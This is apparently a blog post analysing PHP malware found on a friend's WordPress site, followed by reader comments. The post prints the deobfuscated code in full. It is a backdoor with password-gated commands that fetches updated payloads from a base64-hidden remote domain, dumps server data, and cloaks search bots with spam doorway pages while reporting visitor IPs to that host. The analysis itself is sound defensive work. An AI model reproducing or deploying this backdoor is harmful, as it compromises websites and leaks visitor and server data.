        'wp-content/uploads'
    );

    foreach ($default_dirs as $d) if (is_dir($d) && is_writable($d)) return ($d);

    $current_dir = opendir('.');
    while ($dir = readdir($current_dir)) if (!preg_match('/^\.+$/', $dir) && is_dir($dir) && is_writable($dir)) return ($dir);
    closedir($current_dir);

    if (is_writable('.')) return ('.');

    $tmp_dir = sys_get_temp_dir();
    if (is_dir($tmp_dir) && is_writable($tmp_dir)) return $tmp_dir;

    return ".";

}




$content="";
$x=get_val("pppp_check");

$md5pass="e5e4570182820af0a183ce1520afe43b";

$host=strtolower(@$_SERVER["HTTP_HOST"]);
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);$urx=$host.$uri;$md5urx=md5($urx);


$xmd5="/.".$md5host."/";

$cfile="emoji1.png";

if (!@file_exists(".".$xmd5.$cfile)){
    $tmppath=get_db_path();
}else{
    $tmppath=".";
}

$tmppath=$tmppath.$xmd5;@mkdir($tmppath);


$configs=$tmppath.$cfile;
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";

@ini_set('memory_limit','1600M');


$domain=base64_decode("aW5kaWthdGVpdC5ydQ==");

$p="";
if ($x!="")$p=md5(@base64_decode(get_val("p")));

if (($x!="")&&($p==$md5pass)){

    if ($x=="2"){
        echo "###UPDATING_FILES###\n";
        $ur="http://".$domain."/images/".$md5host."/";
        list($buf1,$t)=@curly_page_get($ur."emoji1.png");@file_put_contents($configs,$buf1);
        list($buf1,$t)=@curly_page_get($ur."metaicons.jpg");@file_put_contents($bd,$buf1);
        list($buf1,$t)=@curly_page_get($ur."wp-themesall.gif");@file_put_contents($templ,$buf1);
        echo "###UPDATED###\n";
        exit;
    }


    if ($x=="4"){
        echo "###WORKED###\n";exit;
    }
    if ($x=="5"){
        $cf=array();
        if (@file_exists($configs)){
            $cf=@unserialize(@base64_decode(@file_get_contents($configs)));
        }

        $out=array(
                        'cf' => $cf,
                        'server' => $_SERVER,
                        'file' => __FILE__,
                        'configfile' => $configs,
                        'db_file_size' => is_file($bd) ? filesize($bd) : 0,
                        'template_file_size' => is_file($templ) ? filesize($templ) : 0,
                    );
        echo base64_encode(serialize($out));

        exit;

    }


}else{

    $cf=array();
    if (@file_exists($configs)){
        $cf=@unserialize(@base64_decode(@file_get_contents($configs)));
    }

    if (@isset($cf[$md5urx])){
        $bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
        if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
        if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
        $off=$cf[$md5urx]+0;
        $template=@base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f));@fclose($f);$info=unserialize(base64_decode($buf));
        $keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
        if ($bot) {
            if (isset($info["contenttype"])){$contenttype=@base64_decode($info["contenttype"]);$types=explode("\n",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}

            if (isset($info["isdoor"])){

                if (isset($info["standalone"])){
                    $doorcontent=base64_decode($text);
                    echo $doorcontent;exit;
                }else{
                    if ((isset($info["nr"]))&&(is_array($info["nr"]))){
                        foreach($info["nr"] as $mark => $repl){
                            $template=str_replace($mark,$repl,$template);
                        }
                    }else{
                        $template=str_replace("%text%",$text,$template);
                        $template=str_replace("%title%",$title,$template);
                        $template=str_replace("%description%",$description,$template);
                        $template=str_replace("%uckeyword%",$uckeyword,$template);
                        $template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);

                        foreach($inside_links as $i => $link){
                            $template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
                        }
                    }

                    echo $template;exit;
                }
            }else{

                list($buf,$ct)=get_proxy_page();

                if (stristr($ct,"text/html")){
                    $rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0;
                    $links=$info["links_a"];
                    $buf=change_page_regex($buf,$links,$rega,$resa);

                    $regp='/(.{30}\<\/p\>)/is';$resp=1;
                    $links=$info["links_p"];
                    $buf=change_page_regex($buf,$links,$regp,$resp);
                }

                echo $buf;exit;
            }



        }
        if ($se) {
            if (isset($info["isdoor"])){
                list($buf,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
            }else{
                list($buf,$ct)=get_proxy_page();
            }
            echo $buf;exit;
        }
    }else{

        list($buf,$ct)=get_proxy_page();
        echo $buf;exit;
    }

}


Enter fullscreen mode Exit fullscreen mode

Immediately, I notice $domain which is a base64 encoded string, which when decoded gives:

indikateit.ru

I'm guessing this is the server which the allegedly malcious scripts post information to.

This decoded base64 script references $_COOKIE, $_SERVER & $_REQUEST, the same variables which the first file referenced.

Update: Upon googling some of the base64 decoded code, I found a link on UnPHP of someone who deobfuscated similar code

However, the domain in this one was hlemovka.ru

Top comments (3)

Collapse
 
phantas0s profile image
Matthieu Cneude

Nice job!

I've a question: how does this code ended up on the server of your friend?

For now, my conclusion is: don't use Wordpress. I've so many requests on my server trying to connect to the Wordpress admin (even if my website is not a wordpress), it's insane.

Collapse
 
rat profile image
🐁

Thanks for the comment.

My friend thinks it may be to do with his comment fields: potentially not sanitizing inputs.

Collapse
 
daireisu profile image
Daireisu Khyeras

Just noticed this issue on our own site. Might want to check the web.config file too.

boyet.com/blog/godaddy-shared-wind...